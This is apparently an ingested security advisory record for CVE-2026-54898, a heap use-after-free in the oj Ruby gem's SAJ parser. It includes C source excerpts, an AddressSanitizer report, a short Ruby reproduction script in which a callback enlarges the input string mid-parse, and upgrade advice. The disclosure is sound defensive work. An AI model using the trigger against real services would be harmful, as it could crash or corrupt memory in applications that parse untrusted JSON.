{"id":"CVE-2026-54898","title":"Oj: Use-After-Free in Oj::Parser SAJ Callback via Input Mutation","summary":"Oj: Use-After-Free in Oj::Parser SAJ Callback via Input Mutation","severity":"high","cwe":["CWE-416"],"vendor":"oj","product":"oj","ecosystem":"rubygems","affected":["oj < 3.17.2"],"patched":["oj 3.17.3"],"published":"2026-06-19","updated":"2026-06-19","source":"GHSA","sourceUrl":"https://github.com/advisories/GHSA-q2gm-54r6-8fwm","references":[{"url":"https://github.com/ohler55/oj/security/advisories/GHSA-q2gm-54r6-8fwm"},{"url":"https://github.com/advisories/GHSA-q2gm-54r6-8fwm"}],"tags":["ghsa","rubygems"],"ingestedAt":"2026-06-22T13:35:24.449Z","epss":0.00167,"epssPercentile":0.06389,"slug":"CVE-2026-54898","body":"## Overview\n\n### Summary\n\n`Oj::Parser#parse` is vulnerable to a heap use-after-free when a SAJ/SAJ2 callback mutates the input JSON string during parsing. The C engine holds a raw `const byte *` pointer into the Ruby string's internal buffer. If a callback (e.g. `hash_start`) resizes the string — for example by calling `String#replace` with a longer value — Ruby reallocates the string buffer and frees the old one. The C parser's pointer is left dangling; the next character read at `parser.c:607` is a use-after-free.\n\n### Version\n\n- **Software**: oj gem\n- **Affected**: all versions with `ext/oj/parser.c`\n- **Latest tested**: 3.17.1 (confirmed present)\n\n### Details\n\n`ext/oj/parser.c`, `parser_parse` → `parse`:\n\n```c\nstatic VALUE parser_parse(VALUE self, VALUE json) {\n    const byte *ptr = (const byte *)StringValuePtr(json);  // raw pointer into Ruby string\n    // ...\n    parse(p, ptr);   // ptr used throughout; any realloc frees the backing buffer\n}\n```\n\n```c\n// parser.c:607\nstatic void parse(ojParser p, const byte *json) {\n    const byte *b = json;\n    // ...\n    for (; '\\0' != *b; b++) {   // ← UAF: reads freed memory after callback resizes json\n```\n\nRuby's `String#replace` (or `<<`, `gsub!`, etc.) can trigger a reallocation of the string's internal buffer if the new content is larger than the embedded capacity, freeing the old buffer that `ptr` still points to.\n\nASAN report:\n```\n==372273==ERROR: AddressSanitizer: heap-use-after-free on address 0x51900008ed81\nREAD of size 1 at 0x51900008ed81 thread T0\n    #0 parse          /ext/oj/parser.c:607\n    #1 parser_parse   /ext/oj/parser.c:1408\n0x51900008ed81 is located 1 bytes inside of 1023-byte region [0x51900008ed80, 0x51900008f17f)\nfreed by thread T0 here:\n    #0 free\n    #1 ruby_sized_xfree  (libruby-3.3.so.3.3)\nShadow bytes: [fd]fd fd fd fd fd ...  (entire region freed)\n```\n\n### Reproduce\n\n```ruby\nrequire 'oj'\n\nclass Mutator\n  def initialize(json) = (@json = json; @done = false)\n\n  def hash_start(key)\n    return if @done; @done = true\n    @json.replace('x' * 1_000_000)   # triggers String realloc, frees original buffer\n  end\n\n  def hash_end(key); end\n  def array_start(key); end\n  def array_end(key); end\n  def add_value(value, key); end\nend\n\njson = '{\"a\":1,\"pad\":\"' + ('A' * 1000) + '\",\"z\":2}'\nparser = Oj::Parser.new(:saj)\nparser.handler = Mutator.new(json)\nparser.parse(json)\n```\n\n## Affected packages\n\n- `oj < 3.17.2`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `oj 3.17.3`","depth":"twilight","depthScore":41,"depthScoreParts":{"impact":41.3,"likelihood":0,"exploitation":0,"ransomware":0},"changes":[]}